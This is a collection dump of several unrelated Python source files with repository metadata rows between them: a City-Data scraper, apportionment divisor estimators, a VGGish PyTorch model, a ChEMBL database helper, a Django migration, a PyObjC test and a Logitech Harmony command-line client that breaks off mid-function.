elif GEOGRAPHYS.index(self[CityData_WebContents.GEOGRAPHY].data()) > GEOGRAPHYS.index(geography):
self[CityData_WebContents.ZOOMOUT](*args, **kwargs)
elif GEOGRAPHYS.index(self[CityData_WebContents.GEOGRAPHY].data()) == GEOGRAPHYS.index(geography):
break
else:
pass
self.sleep(5)
self.load[CityData_WebContents.GEOGRAPHY](*args, **kwargs)
self.load[CityData_WebContents.CANVAS](*args, **kwargs)
self.load[CityData_WebContents.ZIPCODE](*args, **kwargs)
self.load[CityData_WebContents.GEOGRAPHY](*args, **kwargs)
@property
def query(self): return {"zipcode": str(self[CityData_WebContents.ZIPCODE].data()), "geography": str(self[CityData_WebContents.GEOGRAPHY].data())}
def execute(self, *args, dataset, **kwargs):
# print(self.source.execute_script("return window.GetPolyStats()"))
# print(self.source.execute_script("return window.getCurrentLevel()"))
# x = list(self.source.execute_script("return window.polyFIPS"))
# y = list(dict(self.source.execute_script("return window.pv"))["pv"])
# raise Exception()
yield dataset, data
class CityData_WebDownloader(WebDownloader + (CacheMixin, AttemptsMixin), attempts=3, delay=30):
@staticmethod
def execute(*args, queue, delayer, **kwargs):
with CityData_WebDriver(DRIVER_FILE, browser="chrome", loadtime=50) as driver:
page = CityData_WebPage(driver, delayer=delayer)
with queue:
for query in iter(queue):
with query:
url = CityData_WebURL(**query.todict())
page.load(url, referer=None)
try:
page.search(*args, **query.todict(), **kwargs)
except BadRequestError:
yield query, CityData_WebDatasets({})
continue
page.setup(*args, **query.todict(), **kwargs)
for dataset, dataframe in page(*args, **query.todict(), **kwargs):
yield query, CityData_WebDatasets({dataset: dataframe})
def main(*args, **kwargs):
delayer = CityData_WebDelayer("constant", wait=3)
scheduler = CityData_WebScheduler(*args, file=REPORT_FILE, **kwargs)
downloader = CityData_WebDownloader(*args, repository=REPOSITORY_DIR, **kwargs)
queue = scheduler(*args, **kwargs)
downloader(*args, queue=queue, delayer=delayer, **kwargs)
LOGGER.info(str(downloader))
for results in downloader.results:
LOGGER.info(str(results))
if not bool(downloader):
raise downloader.error
if __name__ == "__main__":
sys.argv += ["state=CA", "city=Bakersfield", "dataset=violentcrime", "geography=tract"]
logging.basicConfig(level="INFO", format="[%(levelname)s, %(threadName)s]: %(message)s")
inputparser = InputParser(proxys={"assign": "=", "space": "_"}, parsers={}, default=str)
inputparser(*sys.argv[1:])
main(*inputparser.arguments, **inputparser.parameters)
| 47.964844 | 197 | 0.710807 | 7,480 | 0.60917 | 1,318 | 0.107338 | 1,187 | 0.096669 | 0 | 0 | 2,145 | 0.174688 |
7b072a958ac36c49b32339e29f7e4de28848fadd
| 3,644 |
py
|
Python
|
apportionpy/experimental/boundary.py
|
btror/apportionpy
|
5b70dbeee4b197e41794bed061ea4a11f128d1c8
|
[
"MIT"
] | null | null | null |
apportionpy/experimental/boundary.py
|
btror/apportionpy
|
5b70dbeee4b197e41794bed061ea4a11f128d1c8
|
[
"MIT"
] | null | null | null |
apportionpy/experimental/boundary.py
|
btror/apportionpy
|
5b70dbeee4b197e41794bed061ea4a11f128d1c8
|
[
"MIT"
] | null | null | null |
import math
def estimate_lowest_divisor(method, divisor, populations, seats):
"""
Calculates the estimated lowest possible divisor.
:param method: The method used.
:type method: str
:param divisor: A working divisor in calculating fair shares.
:type divisor: float
:param populations: The populations for each state respectively.
:type populations: [float]
:param seats: The amount of seats to apportion.
:type seats: int
:return: An estimation of the lowest possible divisor.
"""
# The number of states to apportion to.
states = sum(populations)
# Initialize lists for fair shares and quotas.
quotas = [0] * states
fair_shares = [0] * states
# Keep track of the previous divisor calculated and lowest of them.
prev_divisor = 0
lowest_divisor = 0
# Estimator to use in predicting divisors.
estimator = 1000000000
counter = 0
while counter < 1000:
for i, population in enumerate(populations):
if divisor is None or population is None:
return None
quotas[i] = population / divisor
if method.upper() == "ADAM":
fair_shares[i] = math.ceil(quotas[i])
elif method.upper() == "WEBSTER":
fair_shares[i] = round(quotas[i])
elif method.upper() == "JEFFERSON":
fair_shares[i] = math.floor(quotas[i])
if sum(fair_shares) != seats:
estimator = estimator / 10
prev_divisor = divisor
divisor = lowest_divisor - estimator
else:
lowest_divisor = divisor
divisor = prev_divisor - estimator
if lowest_divisor == divisor:
break
counter += 1
return math.ceil(lowest_divisor * 1000) / 1000
def estimate_highest_divisor(method, divisor, populations, seats):
"""
Calculates the estimated highest possible divisor.
:param method: The method used.
:type method: str
:param divisor: A working divisor in calculating fair shares.
:type divisor: float
:param populations: The populations for each state respectively.
:type populations: [float]
:param seats: The amount of seats to apportion.
:type seats: int
:return: An estimation of the lowest possible divisor.
"""
# The number of states to apportion to.
states = sum(populations)
# Initialize lists for fair shares and quotas.
quotas = [0] * states
fair_shares = [0] * states
# Keep track of the previous divisor calculated and highest of them.
prev_divisor = 0
highest_divisor = 0
# Estimator to use in predicting divisors.
estimator = 1000000000
counter = 0
while counter < 1000:
for i, population in enumerate(populations):
if divisor is None or population is None:
return None
quotas[i] = population / divisor
if method.upper() == "ADAM":
fair_shares[i] = math.ceil(quotas[i])
elif method.upper() == "WEBSTER":
fair_shares[i] = round(quotas[i])
elif method.upper() == "JEFFERSON":
fair_shares[i] = math.floor(quotas[i])
if sum(fair_shares) != seats:
estimator = estimator / 10
prev_divisor = divisor
divisor = highest_divisor + estimator
else:
highest_divisor = divisor
divisor = prev_divisor - estimator
if highest_divisor == divisor:
break
counter += 1
return math.ceil(highest_divisor * 1000) / 1000
| 30.881356 | 72 | 0.611416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,344 | 0.368825 |
7b0bcb46e200df6f78d9fe78eb07f700564fadd3
| 4,084 |
py
|
Python
|
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | 1 |
2021-11-10T10:28:01.000Z
|
2021-11-10T10:28:01.000Z
|
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | null | null | null |
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
# import pylatex
from pylatex import Document, Section, Tabular, Math, Axis, Subsection
import pandas as pd
import sys
import os
def main():
pm = u"\u00B1"
filename = sys.argv[1]
results = pd.read_csv(filename+'.csv')
cols = results.columns
task_fusion = ((results.loc[results['settings']=='overall']).loc[results['model']!='DummyClassifier']).sort_values('model')
reading = ((results.loc[results['settings']=='Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
cookie = ((results.loc[results['settings']=='CookieTheft']).loc[results['model']!='DummyClassifier']).sort_values('model')
memory = ((results.loc[results['settings']=='Memory']).loc[results['model']!='DummyClassifier']).sort_values('model')
pupil = ((results.loc[results['settings']=='PupilCalib']).loc[results['model']!='DummyClassifier']).sort_values('model')
ET_basic = ((results.loc[results['settings']=='ET_basic']).loc[results['model']!='DummyClassifier']).sort_values('model')
Eye = ((results.loc[results['settings']=='Eye']).loc[results['model']!='DummyClassifier']).sort_values('model')
Language = ((results.loc[results['settings']=='Language']).loc[results['model']!='DummyClassifier']).sort_values('model')
Eye_Reading = ((results.loc[results['settings']=='Eye_Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
NLP_Reading = ((results.loc[results['settings']=='NLP_Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
TextAudio = ((results.loc[results['settings']=='Text+Audio']).loc[results['model']!='DummyClassifier']).sort_values('model')
task_fusion = np.array(task_fusion.dropna()).astype('str')
reading = np.array(reading.dropna()).astype('str')
cookie = np.array(cookie.dropna()).astype('str')
memory = np.array(memory.dropna()).astype('str')
pupil = np.array(pupil.dropna()).astype('str')
ET_basic = np.array(ET_basic.dropna()).astype('str')
Eye = np.array(Eye.dropna()).astype('str')
Language = np.array(Language.dropna()).astype('str')
Eye_Reading = np.array(Eye_Reading.dropna()).astype('str')
NLP_Reading = np.array(NLP_Reading.dropna()).astype('str')
TextAudio = np.array(TextAudio.dropna()).astype('str')
abc = np.array((task_fusion, reading, cookie, memory, pupil, ET_basic, Eye, Language, Eye_Reading, NLP_Reading, TextAudio))
for i in range(len(abc)):
for j in range(len(abc[i])):
if abc[i][j][1] == 'RandomForest':
abc[i][j][1] = 'RF'
elif abc[i][j][1] == 'GausNaiveBayes':
abc[i][j][1] = 'GNB'
elif abc[i][j][1] == 'LogReg':
abc[i][j][1] = 'LR'
geometry_options = {"tmargin": "1cm", "lmargin": "1cm"}
doc = Document(geometry_options=geometry_options)
# for overall task_fusion_result
with doc.create(Section('Results')):
for i in range(len(abc)):
overall = abc[i]
with doc.create(Subsection(overall[0][0])):
with doc.create(Tabular('c c c c c c c c')) as table:
table.add_hline()
table.add_row(('Algo', 'N', 'AUC', 'F1', 'Accuracy', 'Precision', 'Recall', 'Specificity'))
table.add_hline()
for i in range(len(overall)):
table.add_row((overall[i][1], '162',
overall[i][3] + pm + overall[i][12], # roc
overall[i][4] + pm + overall[i][9], # f1
overall[i][2] + pm + overall[i][8], # acc
overall[i][5] + pm + overall[i][10], # prec
overall[i][6] + pm + overall[i][11], # rec
overall[i][7] + pm + overall[i][13])) # spec
doc.generate_pdf(filename, clean_tex=False, compiler='pdflatex')
main()
| 51.696203 | 131 | 0.578355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 938 | 0.229677 |
7b0d0466817dc17050d1085421ef9276feb2fb86
| 2,803 |
py
|
Python
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 26 |
2020-03-25T21:19:33.000Z
|
2022-02-01T15:14:29.000Z
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 7 |
2020-05-31T07:57:05.000Z
|
2021-12-23T10:16:55.000Z
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 8 |
2020-10-27T16:22:55.000Z
|
2022-03-28T22:48:07.000Z
|
import os.path as osp
import yaml
import torch.nn as nn
from torch import hub
__all__ = ['get_vggish', 'vggish_category_metadata']
model_urls = {
'vggish': "https://github.com/w-hc/vggish/releases/download/v0.1/vggish_orig.pth",
'vggish_with_classifier': "https://github.com/w-hc/vggish/releases/download/v0.1/vggish_with_classifier.pth"
}
def vggish_category_metadata():
cat_meta_file = osp.join(
osp.dirname(osp.realpath(__file__)), 'classifier_category.yml'
)
with open(cat_meta_file) as f:
cat_meta = yaml.safe_load(f) # [ [cat_name, mid], ... ]
cat_meta = [ {'name': e[0], 'id': e[1]} for e in cat_meta ]
return cat_meta
class VGGish(nn.Module):
def __init__(self):
super().__init__()
self.features = self.make_layers()
self.embeddings = nn.Sequential(
nn.Linear(512 * 4 * 6, 4096),
nn.ReLU(True),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Linear(4096, 128),
nn.ReLU(True),
)
@staticmethod
def make_layers():
layer_config = [64, "M", 128, "M", 256, 256, "M", 512, 512, "M"]
in_channels = 1
layers = []
for curr in layer_config:
if curr == "M":
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, curr, kernel_size=3, padding=1)
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = curr
return nn.Sequential(*layers)
def forward(self, x):
'''
x: [N, C, T]
'''
# It's regrattable tensorflow authors of this model treats audio signal as 2d
# [N, C, T] -> [N, C, T, 1]
x = self.features(x)
x = x.permute(0, 2, 3, 1) # to tf's [N, H, W, C] order
x = x.reshape(x.shape[0], -1)
x = self.embeddings(x)
return x
class VGGishClassify(VGGish):
'''
Beware that this is a multi-label, not multi-class classifer.
'''
def __init__(self, num_hidden_units=100, num_classes=527):
super().__init__()
self.classifier = nn.Sequential(
nn.Linear(128, num_hidden_units),
nn.ReLU(True),
nn.Linear(num_hidden_units, num_classes),
)
def forward(self, x):
x = super().forward(x)
x = self.classifier(x)
return x
def get_vggish(with_classifier=False, pretrained=True):
if with_classifier:
model = VGGishClassify()
url = model_urls['vggish_with_classifier']
else:
model = VGGish()
url = model_urls['vggish']
if pretrained:
state_dict = hub.load_state_dict_from_url(url, progress=True)
model.load_state_dict(state_dict)
return model
| 29.197917 | 112 | 0.576882 | 1,735 | 0.61898 | 0 | 0 | 510 | 0.181948 | 0 | 0 | 576 | 0.205494 |
7b0d272861a3704f10e9a92801a2d879819c1a06
| 12,584 |
py
|
Python
|
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
import os
import warnings
import pandas
import sqlite3
import logging
from typing import List
from dask import delayed, dataframe
from contextlib import closing
from cuchemcommon.utils.singleton import Singleton
from cuchemcommon.context import Context
warnings.filterwarnings("ignore", message=r"deprecated", category=FutureWarning)
logger = logging.getLogger(__name__)
BATCH_SIZE = 100000
ADDITIONAL_FEILD = ['canonical_smiles', 'transformed_smiles']
IMP_PROPS = [
'alogp',
'aromatic_rings',
'full_mwt',
'psa',
'rtb']
IMP_PROPS_TYPE = [pandas.Series([], dtype='float64'),
pandas.Series([], dtype='int64'),
pandas.Series([], dtype='float64'),
pandas.Series([], dtype='float64'),
pandas.Series([], dtype='int64')]
ADDITIONAL_FEILD_TYPE = [pandas.Series([], dtype='object'),
pandas.Series([], dtype='object')]
SQL_MOLECULAR_PROP = """
SELECT md.molregno as molregno, md.chembl_id, cp.*, cs.*
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.molregno in (%s)
"""
# DEPRECATED. Please add code to DAO classes.
class ChEmblData(object, metaclass=Singleton):
def __init__(self, fp_type):
context = Context()
db_file = context.get_config('data_mount_path', default='/data')
db_file = os.path.join(db_file, 'db/chembl_27.db')
if not os.path.exists(db_file):
logger.error('%s not found', db_file)
raise Exception('{} not found'.format(db_file))
self.fp_type = fp_type
self.chembl_db = 'file:%s?mode=ro' % db_file
logger.info('ChEMBL database: %s...' % self.chembl_db)
def fetch_props_by_molregno(self, molregnos):
"""
Returns compound properties and structure filtered by ChEMBL IDs along
with a list of columns.
"""
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = SQL_MOLECULAR_PROP % " ,".join(list(map(str, molregnos)))
cur.execute(select_stmt)
cols = list(map(lambda x: x[0], cur.description))
return cols, cur.fetchall()
def fetch_props_by_chemble(self, chemble_ids):
"""
Returns compound properties and structure filtered by ChEMBL IDs along
with a list of columns.
"""
sql_stml = """
SELECT md.molregno as molregno, md.chembl_id, cp.*, cs.*
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.chembl_id in (%s)
"""
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = sql_stml % "'%s'" % "','".join([x.strip().upper() for x in chemble_ids])
cur.execute(select_stmt)
cols = list(map(lambda x: x[0], cur.description))
return cols, cur.fetchall()
def fetch_molregno_by_chemblId(self, chemblIds):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT md.molregno as molregno
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.chembl_id in (%s)
''' % "'%s'" % "','".join(chemblIds)
cur.execute(select_stmt)
return cur.fetchall()
def fetch_id_from_chembl(self, new_molecules: List):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT cs.molregno as molregno, md.chembl_id as chembl_id,
cs.canonical_smiles as smiles
FROM compound_structures cs,
molecule_dictionary md
WHERE md.molregno = cs.molregno
AND md.chembl_id in (%s)
''' % "'%s'" % "','".join([x.strip().upper() for x in new_molecules])
cur.execute(select_stmt)
return cur.fetchall()
def fetch_chemblId_by_molregno(self, molregnos):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT md.chembl_id as chembl_id
FROM molecule_dictionary md
WHERE md.molregno in (%s)
''' % ", ".join(list(map(str, molregnos)))
cur.execute(select_stmt)
return cur.fetchall()
def fetch_approved_drugs(self):
"""Fetch approved drugs with phase >=3 as dataframe
Args:
chembl_db_path (string): path to chembl sqlite database
Returns:
pd.DataFrame: dataframe containing SMILES strings and molecule index
"""
logger.debug('Fetching ChEMBL approved drugs...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = """SELECT
di.molregno,
cs.canonical_smiles,
di.max_phase_for_ind
FROM
drug_indication AS di
LEFT JOIN compound_structures AS cs ON di.molregno = cs.molregno
WHERE
di.max_phase_for_ind >= 3
AND cs.canonical_smiles IS NOT NULL;"""
cur.execute(select_stmt)
return cur.fetchall()
def fetch_random_samples(self, num_samples, max_len):
"""Fetch random samples from ChEMBL as dataframe
Args:
num_samples (int): number of samples to select
chembl_db_path (string): path to chembl sqlite database
Returns:
pd.DataFrame: dataframe containing SMILES strings and molecule index
"""
logger.debug('Fetching ChEMBL random samples...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = """SELECT
cs.molregno,
cs.canonical_smiles,
LENGTH(cs.canonical_smiles) as len
FROM
compound_structures AS cs
WHERE
cs.canonical_smiles IS NOT NULL
AND
len <= """ + f'{max_len}' + """
ORDER BY RANDOM()
LIMIT """ + f'{num_samples};'
cur.execute(select_stmt)
return cur.fetchall()
def fetch_molecule_cnt(self):
logger.debug('Finding number of molecules...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT count(*)
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
'''
cur.execute(select_stmt)
return cur.fetchone()[0]
def _meta_df(self, **transformation_kwargs):
transformation = self.fp_type(**transformation_kwargs)
prop_meta = {'id': pandas.Series([], dtype='int64')}
prop_meta.update(dict(zip(IMP_PROPS + ADDITIONAL_FEILD,
IMP_PROPS_TYPE + ADDITIONAL_FEILD_TYPE)))
prop_meta.update({i: pandas.Series([], dtype='float32') for i in range(len(transformation))})
return pandas.DataFrame(prop_meta)
def _fetch_mol_embedding(self,
start=0,
batch_size=BATCH_SIZE,
molregnos=None,
**transformation_kwargs):
"""
Returns compound properties and structure for the first N number of
records in a dataframe.
"""
logger.info('Fetching %d records starting %d...' % (batch_size, start))
imp_cols = ['cp.' + col for col in IMP_PROPS]
if molregnos is None:
select_stmt = '''
SELECT md.molregno, %s, cs.canonical_smiles
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
LIMIT %d, %d
''' % (', '.join(imp_cols), start, batch_size)
else:
select_stmt = '''
SELECT md.molregno, %s, cs.canonical_smiles
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.molregno in (%s)
LIMIT %d, %d
''' % (', '.join(imp_cols), " ,".join(list(map(str, molregnos))), start, batch_size)
df = pandas.read_sql(select_stmt,
sqlite3.connect(self.chembl_db, uri=True))
# Smiles -> Smiles transformation and filtering
# TODO: Discuss internally to find use or refactor this code to remove
# model specific filtering
df['transformed_smiles'] = df['canonical_smiles']
# if smiles_transforms is not None:
# if len(smiles_transforms) > 0:
# for xf in smiles_transforms:
# df['transformed_smiles'] = df['transformed_smiles'].map(xf.transform)
# df.dropna(subset=['transformed_smiles'], axis=0, inplace=True)
# Conversion to fingerprints or embeddings
# transformed_smiles = df['transformed_smiles']
transformation = self.fp_type(**transformation_kwargs)
cache_data = transformation.transform(df)
return_df = pandas.DataFrame(cache_data)
return_df = pandas.DataFrame(
return_df,
columns=pandas.RangeIndex(start=0,
stop=len(transformation))).astype('float32')
return_df = df.merge(return_df, left_index=True, right_index=True)
return_df.rename(columns={'molregno': 'id'}, inplace=True)
return return_df
def fetch_mol_embedding(self,
num_recs=None,
batch_size=BATCH_SIZE,
molregnos=None,
**transformation_kwargs):
"""
Returns compound properties and structure for the first N number of
records in a dataframe.
"""
logger.debug('Fetching properties for all molecules...')
if num_recs is None or num_recs < 0:
num_recs = self.fetch_molecule_cnt()
logger.info('num_recs %d', num_recs)
logger.info('batch_size %d', batch_size)
meta_df = self._meta_df(**transformation_kwargs)
dls = []
for start in range(0, num_recs, batch_size):
bsize = min(num_recs - start, batch_size)
dl_data = delayed(self._fetch_mol_embedding)(start=start,
batch_size=bsize,
molregnos=molregnos,
**transformation_kwargs)
dls.append(dl_data)
return dataframe.from_delayed(dls, meta=meta_df)
def save_fingerprints(self, hdf_path='data/filter_*.h5', num_recs=None, batch_size=5000):
"""
Generates fingerprints for all ChEMBL ID's in the database
"""
logger.debug('Fetching molecules from database for fingerprints...')
mol_df = self.fetch_mol_embedding(num_recs=num_recs, batch_size=batch_size)
mol_df.to_hdf(hdf_path, 'fingerprints')
| 39.202492 | 101 | 0.565559 | 11,324 | 0.899873 | 0 | 0 | 0 | 0 | 0 | 0 | 5,663 | 0.450016 |
7b0dd834a233f033a4537593bd1c545e5c4ea02a
| 769 |
py
|
Python
|
tests/app/users/migrations/0001_initial.py
|
silverlogic/djangorestframework-timed-auth-token
|
0884559c6b5e4021d7a8830ec5dd60f2799d0ee4
|
[
"MIT"
] | 34 |
2015-05-22T00:02:49.000Z
|
2021-12-29T11:42:31.000Z
|
tests/app/users/migrations/0001_initial.py
|
silverlogic/djangorestframework-timed-auth-token
|
0884559c6b5e4021d7a8830ec5dd60f2799d0ee4
|
[
"MIT"
] | 6 |
2015-05-22T00:04:50.000Z
|
2021-06-10T17:49:38.000Z
|
tests/app/users/migrations/0001_initial.py
|
silverlogic/djangorestframework-timed-auth-token
|
0884559c6b5e4021d7a8830ec5dd60f2799d0ee4
|
[
"MIT"
] | 6 |
2015-05-25T17:44:50.000Z
|
2020-12-05T14:48:53.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
('password', models.CharField(verbose_name='password', max_length=128)),
('last_login', models.DateTimeField(verbose_name='last login', null=True, blank=True)),
('identifier', models.CharField(unique=True, max_length=40)),
],
options={
'abstract': False,
},
),
]
| 29.576923 | 114 | 0.574772 | 660 | 0.858257 | 0 | 0 | 0 | 0 | 0 | 0 | 109 | 0.141743 |
7b0e27fa7adc3752fa6c840a8e64f5d20d45801c
| 370 |
py
|
Python
|
PyObjCTest/test_nsmachport.py
|
Khan/pyobjc-framework-Cocoa
|
f8b015ea2a72d8d78be6084fb12925c4785b8f1f
|
[
"MIT"
] | 132 |
2015-01-01T10:02:42.000Z
|
2022-03-09T12:51:01.000Z
|
mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsmachport.py
|
mba811/music-player
|
7998986b34cfda2244ef622adefb839331b81a81
|
[
"BSD-2-Clause"
] | 6 |
2015-01-06T08:23:19.000Z
|
2019-03-14T12:22:06.000Z
|
mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsmachport.py
|
mba811/music-player
|
7998986b34cfda2244ef622adefb839331b81a81
|
[
"BSD-2-Clause"
] | 27 |
2015-02-23T11:51:43.000Z
|
2022-03-07T02:34:18.000Z
|
from PyObjCTools.TestSupport import *
import objc
import Foundation
if hasattr(Foundation, 'NSMachPort'):
class TestNSMachPort(TestCase):
def testAlloc(self):
obj = Foundation.NSMachPort.alloc()
self.assertIsNot(obj, None)
obj = obj.init()
self.assertIsNot(obj, None)
if __name__ == '__main__':
main( )
| 23.125 | 47 | 0.632432 | 218 | 0.589189 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0.059459 |
7b13d630c689e01a72a9bc979b93bb26fb000d70
| 7,125 |
py
|
Python
|
harmony.py
|
cyrushadavi/home_automation
|
dcf1dcc688b5021a0c16e68e372e38a28d819f3d
|
[
"MIT"
] | null | null | null |
harmony.py
|
cyrushadavi/home_automation
|
dcf1dcc688b5021a0c16e68e372e38a28d819f3d
|
[
"MIT"
] | null | null | null |
harmony.py
|
cyrushadavi/home_automation
|
dcf1dcc688b5021a0c16e68e372e38a28d819f3d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
"""Command line utility for querying the Logitech Harmony."""
import argparse
import logging
import json
import sys
import auth
import client as harmony_client
LOGGER = logging.getLogger(__name__)
def login_to_logitech(args):
"""Logs in to the Logitech service.
Args:
args: argparse arguments needed to login.
Returns:
Session token that can be used to log in to the Harmony device.
"""
token = auth.login(args.email, args.password)
if not token:
sys.exit('Could not get token from Logitech server.')
session_token = auth.swap_auth_token(
args.harmony_ip, args.harmony_port, token)
if not session_token:
sys.exit('Could not swap login token for session token.')
return session_token
def pprint(obj):
"""Pretty JSON dump of an object."""
print(json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': ')))
def get_client(args):
"""Connect to the Harmony and return a Client instance."""
token = login_to_logitech(args)
client = harmony_client.create_and_connect_client(
args.harmony_ip, args.harmony_port, token)
return client
def show_config(args):
"""Connects to the Harmony and prints its configuration."""
client = get_client(args)
pprint(client.get_config())
client.disconnect(send_close=True)
return 0
def show_current_activity(args):
"""Connects to the Harmony and prints the current activity block
from the config."""
client = get_client(args)
config = client.get_config()
current_activity_id = client.get_current_activity()
activity = [x for x in config['activity'] if int(x['id']) == current_activity_id][0]
pprint(activity)
client.disconnect(send_close=True)
return 0
def sync(args):
"""Connects to the Harmony and syncs it.
"""
client = get_client(args)
client.sync()
client.disconnect(send_close=True)
return 0
def turn_off(args):
"""Sends a 'turn off' command to the harmony, which is the activity
'-1'."""
args.activity = '-1'
start_activity(args)
def start_activity(args):
"""Connects to the Harmony and switches to a different activity,
specified as an id or label."""
client = get_client(args)
config = client.get_config()
print args
activity_off = False
activity_numeric = False
activity_id = None
activity_label = None
try:
activity_off = float(args.activity) == -1
activity_id = int(float(args.activity))
activity_numeric = True
except ValueError:
activity_off = args.activity.lower() == 'turn off'
activity_label = str(args.activity)
if activity_off:
activity = [{'id': -1, 'label': 'Turn Off'}]
else:
activity = [x for x in config['activity']
if (activity_numeric and int(x['id']) == activity_id)
or x['label'].lower() == activity_label
]
if not activity:
LOGGER.error('could not find activity: ' + args.activity)
client.disconnect(send_close=True)
return 1
activity = activity[0]
client.start_activity(int(activity['id']))
LOGGER.info("started activity: '%s' of id: '%s'" % (activity['label'], activity['id']))
client.disconnect(send_close=True)
return 0
def send_command(args):
"""Connects to the Harmony and send a simple command."""
client = get_client(args)
config = client.get_config()
device = args.device if args.device_id is None else args.device_id
device_numeric = None
try:
device_numeric = int(float(device))
except ValueError:
pass
device_config = [x for x in config['device'] if device.lower() == x['label'].lower() or
((device_numeric is not None) and device_numeric == int(x['id']))]
if not device_config:
LOGGER.error('could not find device: ' + device)
client.disconnect(send_close=True)
return 1
device_id = int(device_config[0]['id'])
client.send_command(device_id, args.command)
client.disconnect(send_close=True)
return 0
def main():
"""Main method for the script."""
parser = argparse.ArgumentParser(
description='pyharmony utility script',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Required flags go here.
required_flags = parser.add_argument_group('required arguments')
required_flags.add_argument('--email', required=True, help=(
'Logitech username in the form of an email address.'))
required_flags.add_argument(
'--password', required=True, help='Logitech password.')
required_flags.add_argument(
'--harmony_ip', required=True, help='IP Address of the Harmony device.')
# Flags with defaults go here.
parser.add_argument('--harmony_port', default=5222, type=int, help=(
'Network port that the Harmony is listening on.'))
loglevels = dict((logging.getLevelName(level), level)
for level in [10, 20, 30, 40, 50])
parser.add_argument('--loglevel', default='INFO', choices=loglevels.keys(),
help='Logging level to print to the console.')
subparsers = parser.add_subparsers()
show_config_parser = subparsers.add_parser(
'show_config', help='Print the Harmony device configuration.')
show_config_parser.set_defaults(func=show_config)
show_activity_parser = subparsers.add_parser(
'show_current_activity', help='Print the current activity config.')
show_activity_parser.set_defaults(func=show_current_activity)
start_activity_parser = subparsers.add_parser(
'start_activity', help='Switch to a different activity.')
start_activity_parser.add_argument(
'activity', help='Activity to switch to, id or label.')
start_activity_parser.set_defaults(func=start_activity)
sync_parser = subparsers.add_parser(
'sync', help='Sync the harmony.')
sync_parser.set_defaults(func=sync)
turn_off_parser = subparsers.add_parser(
'turn_off', help='Send a turn off command to the harmony.')
turn_off_parser.set_defaults(func=turn_off)
command_parser = subparsers.add_parser(
'send_command', help='Send a simple command.')
command_parser.add_argument('--command',
help='IR Command to send to the device.', required=True)
device_arg_group = command_parser.add_mutually_exclusive_group(required=True)
device_arg_group.add_argument('--device_id',
help='Specify the device id to which we will send the command.')
device_arg_group.add_argument('--device',
